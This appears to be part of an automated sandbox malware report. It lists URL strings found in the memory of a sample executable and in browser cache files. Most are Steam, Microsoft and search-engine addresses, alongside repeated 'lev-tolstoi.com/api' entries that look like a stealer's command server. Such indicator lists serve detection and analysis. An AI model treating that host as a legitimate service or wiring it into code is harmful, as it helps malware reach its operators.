Source: z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: chromecache_121.6.dr	String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
Source: chromecache_121.6.dr	String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
Source: z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: chromecache_99.6.dr, chromecache_118.6.dr	String found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
Source: z3IxCpcpg4.exe, 00000000.00000003.2285428309.0000000005167000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: z3IxCpcpg4.exe, 00000000.00000003.2211227482.00000000051A2000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2211143601.00000000051A4000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2211352399.00000000051A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: z3IxCpcpg4.exe, 00000000.00000003.2211227482.00000000051A2000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2211143601.00000000051A4000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2211352399.00000000051A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: z3IxCpcpg4.exe, 00000000.00000003.2211227482.00000000051A2000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2211143601.00000000051A4000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2211352399.00000000051A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chromecache_99.6.dr, chromecache_118.6.dr	String found in binary or memory: https://channel9.msdn.com/
Source: z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: chromecache_99.6.dr, chromecache_118.6.dr	String found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
Source: z3IxCpcpg4.exe, 00000000.00000003.2293198896.0000000000931000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.co
Source: z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000921000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000921000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000921000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000921000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000921000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000921000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: z3IxCpcpg4.exe, 00000000.00000003.2285428309.0000000005167000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: z3IxCpcpg4.exe, 00000000.00000003.2211227482.00000000051A2000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2211143601.00000000051A4000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2211352399.00000000051A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: z3IxCpcpg4.exe, 00000000.00000003.2211227482.00000000051A2000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2211143601.00000000051A4000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2211352399.00000000051A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: z3IxCpcpg4.exe, 00000000.00000003.2211227482.00000000051A2000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2211143601.00000000051A4000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2211352399.00000000051A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chromecache_121.6.dr	String found in binary or memory: https://github.com/Thraka
Source: chromecache_121.6.dr	String found in binary or memory: https://github.com/Youssef1313
Source: chromecache_121.6.dr	String found in binary or memory: https://github.com/adegeo
Source: chromecache_121.6.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
Source: chromecache_121.6.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
Source: chromecache_121.6.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
Source: chromecache_121.6.dr	String found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
Source: chromecache_99.6.dr, chromecache_118.6.dr	String found in binary or memory: https://github.com/dotnet/try
Source: chromecache_121.6.dr	String found in binary or memory: https://github.com/gewarren
Source: chromecache_99.6.dr, chromecache_118.6.dr	String found in binary or memory: https://github.com/jonschlinkert/is-plain-object
Source: chromecache_99.6.dr, chromecache_118.6.dr	String found in binary or memory: https://github.com/js-cookie/js-cookie
Source: chromecache_121.6.dr	String found in binary or memory: https://github.com/mairaw
Source: chromecache_121.6.dr	String found in binary or memory: https://github.com/nschonni
Source: z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: z3IxCpcpg4.exe, 00000000.00000003.2285428309.0000000005167000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: chromecache_121.6.dr	String found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
Source: chromecache_99.6.dr, chromecache_118.6.dr	String found in binary or memory: https://learn-video.azurefd.net/vod/player
Source: z3IxCpcpg4.exe, 00000000.00000003.2478557246.0000000000915000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2261263937.0000000005167000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2293346349.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/api
Source: z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/api9
Source: z3IxCpcpg4.exe, 00000000.00000003.2397251222.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2478557246.0000000000915000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2293346349.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/apiR
Source: z3IxCpcpg4.exe, 00000000.00000003.2260445967.0000000005167000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2260833190.0000000005169000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2261263937.0000000005167000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/apikTeFHh
Source: z3IxCpcpg4.exe, 00000000.00000003.2285428309.0000000005167000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2294277838.0000000005169000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2285779067.0000000005169000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/apim
Source: z3IxCpcpg4.exe, 00000000.00000003.2397251222.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2478557246.0000000000915000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/apim1
Source: z3IxCpcpg4.exe, 00000000.00000003.2397251222.00000000008DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/apisY
Source: z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: chromecache_99.6.dr, chromecache_118.6.dr	String found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
Source: chromecache_99.6.dr, chromecache_118.6.dr	String found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
Source: chromecache_99.6.dr, chromecache_118.6.dr	String found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
Source: z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: chromecache_99.6.dr, chromecache_118.6.dr	String found in binary or memory: https://octokit.github.io/rest.js/#throttling
Source: z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: chromecache_118.6.dr	String found in binary or memory: https://schema.org
Source: z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/04-0
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
